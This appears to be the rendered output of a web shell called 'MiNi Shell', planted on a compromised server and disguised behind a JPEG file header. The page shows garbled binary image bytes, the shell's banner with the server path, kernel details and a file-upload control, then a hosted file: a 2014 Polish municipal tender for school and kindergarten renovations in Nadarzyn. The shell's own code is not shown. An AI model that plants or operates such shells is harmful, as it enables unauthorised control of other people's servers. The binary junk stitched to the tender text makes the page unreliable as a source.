JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140602/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140602/118421-N-2014.html

<p class="kh_header"><b>Nadarzyn: Zadanie nr 1.ROBOTY REMONTOWE OGÓLNOBUDOWLANE W BUDYNKU SZKOŁY PODSTAWOWEJ  W NADARZYNIE
Zadanie nr 2.ROBOTY REMONTOWE OGÓLNOBUDOWLANE W BUDYNKU SZKOŁY PODSTAWOWEJ W KOSTOWCU
Zadanie nr 3.ROBOTY REMONTOWE OGÓLNOBUDOWLANE W BUDYNKU GIMNAZJUM W NADARZYNIE
Zadanie nr 4.ROBOTY REMONTOWE OGÓLNOBUDOWLANE W BUDYNKU PRZEDSZKOLA W MŁOCHOWIE
Zadanie nr 5.ROBOTY REMONTOWE OGÓLNOBUDOWLANE W BUDYNKU PRZEDSZKOLA W NADARZYNIE
Zadanie nr 6.ROBOTY REMONTOWE OGÓLNOBUDOWLANE W BUDZNKU PRYEDSYKOLA W WOLICY</b><br>
<b>Numer ogłoszenia: 118421 - 2014; data zamieszczenia: 02.06.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Nadarzyn , ul. Mszczonowska 24, 05-830 Nadarzyn, woj. mazowieckie, tel. 22 7298185, faks 22 7298175.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.nadarzyn.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zadanie nr 1.ROBOTY REMONTOWE OGÓLNOBUDOWLANE W BUDYNKU SZKOŁY PODSTAWOWEJ  W NADARZYNIE
Zadanie nr 2.ROBOTY REMONTOWE OGÓLNOBUDOWLANE W BUDYNKU SZKOŁY PODSTAWOWEJ W KOSTOWCU
Zadanie nr 3.ROBOTY REMONTOWE OGÓLNOBUDOWLANE W BUDYNKU GIMNAZJUM W NADARZYNIE
Zadanie nr 4.ROBOTY REMONTOWE OGÓLNOBUDOWLANE W BUDYNKU PRZEDSZKOLA W MŁOCHOWIE
Zadanie nr 5.ROBOTY REMONTOWE OGÓLNOBUDOWLANE W BUDYNKU PRZEDSZKOLA W NADARZYNIE
Zadanie nr 6.ROBOTY REMONTOWE OGÓLNOBUDOWLANE W BUDZNKU PRYEDSYKOLA W WOLICY.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia są:
Zadanie 1. 
Roboty remontowe ogólnobudowlane w budynku Szkoły Podstawowej w Nadarzynie obejmujące:
- modernizacja pokoju wice dyrektora na sale lekcyjną, 
- modernizacja sali 24,
- nawiew w pomieszczeniach wc,
- wymiana drzwi w sali 209,
- malowanie : korytarz przy Sali, szatnie, jadalnie, korytarz parter, piętro, klatka schodowa, sala 110, 201, 202, 109, 104, 207, 17, 19, 24, 21, 10, 9, 8, 26, 27, 25, 28, pomieszczenie woźnych,
- zamurowanie otworu 201-202

Zadanie 2. 
ROBOTY REMONTOWE OGÓLNOBUDOWLANE W BUDYNKU SZKOŁY PODSTAWOWEJ  W KOSTOWCU obejmujące:
- wymiana drzwi do sal,
- montaż czujek gazu,
- roboty konserwacyjne na obiekcie Orlika,

Zadanie nr 3. 
ROBOTY REMONTOWE OGÓLNOBUDOWLANE W BUDYNKU GIMNAZJUM W NADARZYNIE obejmujące:
- malowanie szatni,
- malowanie wnęk na korytarzach,
- malowanie korytarza dolnego 

Zadanie nr 4.
ROBOTY REMONTOWE OGÓLNOBUDOWLANE W BUDYNKU PRZEDSZKOLA         W MŁOCHOWIE obejmujące:
- malowanie kuchni i bloku żywieniowego,
- malowanie bramy i ogrodzenia wzdłuż ul. Źródlanej
- malowanie grzejników ,
- malowanie drzwi wewnętrznych.
 
Zadanie nr 5.
ROBOTY REMONTOWE OGÓLNOBUDOWLANE W BUDYNKU PRZEDSZKOLA         W NADARZYNIE obejmujące:
- cyklinowanie parkietu w salach dydaktycznych - I piętro,
- remont osłon grzejnikowych (sala 1, 2, 3, 4, 5),
- demontaż drzwi pomiędzy salami III i IV,
- wymiana starych drzwi do schowków,
- malowanie sal: sala I, II, III, IV, V,
- malowanie zaplecza kuchni,

Zadanie nr 6.
ROBOTY REMONTOWE OGÓLNOBUDOWLANE W BUDYNKU PRZEDSZKOLA W WOLICY obejmujące:
- malowanie szatni, 
- malowanie sali gimnastycznej,
- cyklinowanie parkietu sali gimnastycznej


2. Prace powinny być wykonywane zgodnie z umową, specyfikacją techniczną   i warunkami  technicznymi wykonania i odbioru robót, obowiązującymi przepisami w zakresie bezpieczeństwa i ochrony zdrowia podczas prowadzenia  prac budowlanych.

3.  Na wykonane roboty Wykonawca udzieli co najmniej 24-miesięcznej gwarancji jakości i rękojmi za wady licząc od daty podpisania protokolarnego bezusterkowego odbioru robót.

4. Szczegółowy zakres robót zawarty jest w załączonych do niniejszej SIWZ opisie przedmiotu zamówienia - zał. Nr 8 do SIWZ:
1)	Specyfikacje Techniczne Wykonania i Odbioru Robót Budowlanych
2)	Przedmiar robót (Zadanie nr 1 - 6),
3)	wzorze umowy..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.45.30.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 6.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 30.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>działalność stanowiąca przedmiot zamówienia nie wymaga posiadania szczególnych uprawnień wynikających z przepisów prawa.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonali co najmniej:
a) dwie roboty budowlane związane z wykonaniem remontów/przebudów/modernizacji obiektów kubaturowych wykonanych w sposób należyty, zgodnie z zasadami sztuki budowlanej i prawidłowo ukończonych - dla zadania nr 2, 3, 4 i 6
b) dwie roboty budowlane związane z wykonaniem remontów/przebudów/modernizacji obiektów kubaturowych o wartości nie mniejszej niż 80.000,00 zł brutto każda; wykonanych w sposób należyty, zgodnie z zasadami sztuki budowlanej i prawidłowo ukończonych - dla  Zadania 1 i 5.
1. Ocena sposobu dokonywania spełniania warunków udziału w postępowaniu będzie dokonana wg formuły spełnia/nie spełnia w oparciu o złożone dokumenty. Nie spełnienie w/w warunków skutkować będzie wykluczeniem z postępowania.

2. W przypadku wspólnego ubiegania się dwóch lub więcej Wykonawców o udzielenie niniejszego zamówienia, oceniany będzie ich łączny potencjał techniczny i kadrowy, łączne doświadczenie i wiedza oraz ich łączna sytuacja ekonomiczna i finansowa.

3. Uwaga: W przypadku podania kwot w walutach obcych Zamawiający dokona ich przeliczenia według średniego kursu NBP z dnia opublikowania ogłoszenia o zamówieniu w Dzienniku Urzędowym Unii Europejskiej. Jeżeli w dniu opublikowania się ogłoszenia o zamówieniu, NBP nie opublikuje informacji o średnim kursie walut, Zamawiający dokona odpowiednich przeliczeń wg średniego kursu z pierwszego, kolejnego dnia, w którym NBP opublikuje ww. informacje.
4. Wykaz oświadczeń i dokumentów, jakie Wykonawcy mają dostarczyć w celu potwierdzenia spełnienia warunków udziału w postępowaniu:
1) Oświadczenie o spełnianiu warunków udziału w postępowaniu na załączniku nr 2;
2) załącznik nr 3 - wykaz robót budowlanych wykonanych w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;   Za najważniejsze roboty uznaje się roboty niezbędne do wykazania spełniania warunku określonego w pkt 2.
a)Dowodami potwierdzającymi czy roboty zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone, są:
- poświadczenie lub inne dokumenty, jeżeli z uzasadnionych przyczyn o obiektywnym charakterze   Wykonawca nie jest w stanie uzyskać poświadczenia. 
b)Jeżeli Zamawiający (Gmina Nadarzyn) jest podmiotem, na rzecz którego roboty budowlane wskazane w wykazie - załączniku nr 3, zostały wcześniej wykonane, Wykonawca nie ma obowiązku przedkładania dowodów, o których mowa powyżej.
c)W razie konieczności, szczególnie gdy wykaz robót lub dowody potwierdzające czy roboty zostały wykonane w sposób należyty, lub czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone, budzą wątpliwości Zamawiającego, Zamawiający może zwrócić się bezpośrednio do właściwego podmiotu, na rzecz którego roboty budowlane były wykonane, o przedłożenie dodatkowych informacji lub dokumentów bezpośrednio Zamawiającemu.
3) Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia innych podmiotów. W takiej sytuacji Wykonawca jest zobowiązany udowodnić Zamawiającemu, że będzie dysponował zasobami niezbędnymi do realizacji zamówienia, przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.

4)  Jeżeli Wykonawca, wykazując spełnianie warunków udziału w postępowaniu, o których mowa w art.22 ust.1 ustawy, polega na zasobach innych podmiotów na zasadach określonych w art.26 ust.2b ustawy, Zamawiający, w celu oceny, czy Wykonawca będzie dysponował zasobami innych podmiotów w stopniu niezbędnym dla należytego wykonania zamówienia oraz oceny, czy stosunek łączący Wykonawcę z tymi podmiotami gwarantuje rzeczywisty dostęp do ich zasobów, może żądać dokumentów dotyczących w szczególności:
a)	zakresu dostępnych Wykonawcy zasobów innego podmiotu,
b)	sposobu wykorzystania zasobów innego podmiotu, przez Wykonawcę, przy wykonywaniu zamówienia,
c)	charakteru stosunku, jaki będzie łączył Wykonawcę z innym podmiotem,
d)	zakresu i okresu udziału innego podmiotu przy wykonywaniu zamówienia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczególnych wymagań.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>będzie dysponował w realizacji zamówienia osobami w specjalności: 
- Kierownik robót - min. 1 osoba posiadająca uprawnienia budowlane do kierowania robotami budowlanymi w zakresie branży ogólnobudowlanej; 
W przypadku Wykonawców zagranicznych - uprawnienia równoważne do kierowania robotami.
1. Ocena sposobu dokonywania spełniania warunków udziału w postępowaniu będzie dokonana wg formuły spełnia/nie spełnia w oparciu o złożone dokumenty. Nie spełnienie w/w warunków skutkować będzie wykluczeniem z postępowania.
2. W przypadku wspólnego ubiegania się dwóch lub więcej Wykonawców o udzielenie niniejszego zamówienia, oceniany będzie ich łączny potencjał techniczny i kadrowy, łączne doświadczenie i wiedza oraz ich łączna sytuacja ekonomiczna i finansowa.
3. Wykaz oświadczeń i dokumentów, jakie Wykonawcy mają dostarczyć w celu potwierdzenia spełnienia warunków udziału w postępowaniu:
1) Oświadczenie o spełnianiu warunków udziału w postępowaniu na załączniku nr 2;
2) załącznik nr 4 - wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;
3) Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia innych podmiotów. W takiej sytuacji Wykonawca jest zobowiązany udowodnić Zamawiającemu, że będzie dysponował zasobami niezbędnymi do realizacji zamówienia, przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.
4)  Jeżeli Wykonawca, wykazując spełnianie warunków udziału w postępowaniu, o których mowa w art.22 ust.1 ustawy, polega na zasobach innych podmiotów na zasadach określonych w art.26 ust.2b ustawy, Zamawiający, w celu oceny, czy Wykonawca będzie dysponował zasobami innych podmiotów w stopniu niezbędnym dla należytego wykonania zamówienia oraz oceny, czy stosunek łączący Wykonawcę z tymi podmiotami gwarantuje rzeczywisty dostęp do ich zasobów, może żądać dokumentów dotyczących w szczególności:
a)	zakresu dostępnych Wykonawcy zasobów innego podmiotu,
b)	sposobu wykorzystania zasobów innego podmiotu, przez Wykonawcę, przy wykonywaniu zamówienia,
c)	charakteru stosunku, jaki będzie łączył Wykonawcę z innym podmiotem,
d)	zakresu i okresu udziału innego podmiotu przy wykonywaniu zamówienia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczególnych wymagań.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>wprowadzenia istotnej zmiany umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, w następujących okolicznościach:
1)	zmiany wysokości podatku VAT, jeżeli w okresie obowiązywania umowy nastąpi zmiana przepisów podatkowych,
2)	zmiany lub rezygnacji z podwykonawcy dotyczącej podmiotu, na którego zasoby Wykonawca powoływał się na zasadach określonych w art.26 ust.2b, w celu wykazania spełniania warunków udziału w postępowaniu, o których mowa w art.22 ust.1, Wykonawca jest obowiązany wykazać, iż proponowany inny podwykonawca lub Wykonawca samodzielnie spełnia warunki w stopniu nie mniejszym niż wymagany w trakcie postępowania o udzielenie zamówienia publicznego, 
3)	zmiany podwykonawców lub zakresu robót wykonywanych przez podwykonawców zgłoszonych przez Wykonawców według postanowień § 9 umowy,
4)	wystąpienie siły wyższej określonej w umowie,
5)	wystąpienie nadzwyczajnych warunków atmosferycznych w szczególności klęsk żywiołowych, uniemożliwiających prowadzenie robót budowlanych,
6)	jeżeli konieczność zmiany terminu wykonania przedmiotu umowy wynikła z okoliczności, niezawinionych przez Wykonawcę, w szczególności została wymuszona oczekiwaniem na uzgodnienia lub wydanie decyzji przez jakikolwiek właściwy organ,
7)	zmiany uzasadnione okolicznościami o których mowa w art. 357 (1)Kodeksu Cywilnego,
8)	w przypadku wystąpienia okoliczności wstrzymania prowadzonej inwestycji przez czynniki zewnętrzne (np. inne niezależne budowy),
9)	jeżeli konieczność wprowadzenia takiej zmiany wynika z okoliczności, których nie można było przewidzieć w ogłoszeniu o zamówieniu lub SIWZ.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.nadarzyn.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> URZĄD GMINY NADARZYN, 05-830 NADARZYN, ul. MSZCZONOWSKA 24.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.06.2014 godzina 10:00, miejsce: URZĄD GMINY NADARZYN, 05-830 NADARZYN, ul. MSZCZONOWSKA 24, pokój nr 100..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie nr 1.
ROBOTY REMONTOWE OGÓLNOBUDOWLANE W BUDYNKU SZKOŁY PODSTAWOWEJ  W NADARZYNIE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia są:
Zadanie 1. 
Roboty remontowe ogólnobudowlane w budynku Szkoły Podstawowej w Nadarzynie obejmujące:
- modernizacja pokoju wice dyrektora na sale lekcyjną, 
- modernizacja sali 24,
- nawiew w pomieszczeniach wc,
- wymiana drzwi w sali 209,
- malowanie : korytarz przy Sali, szatnie, jadalnie, korytarz parter, piętro, klatka schodowa, sala 110, 201, 202, 109, 104, 207, 17, 19, 24, 21, 10, 9, 8, 26, 27, 25, 28, pomieszczenie woźnych,
- zamurowanie otworu 201-202
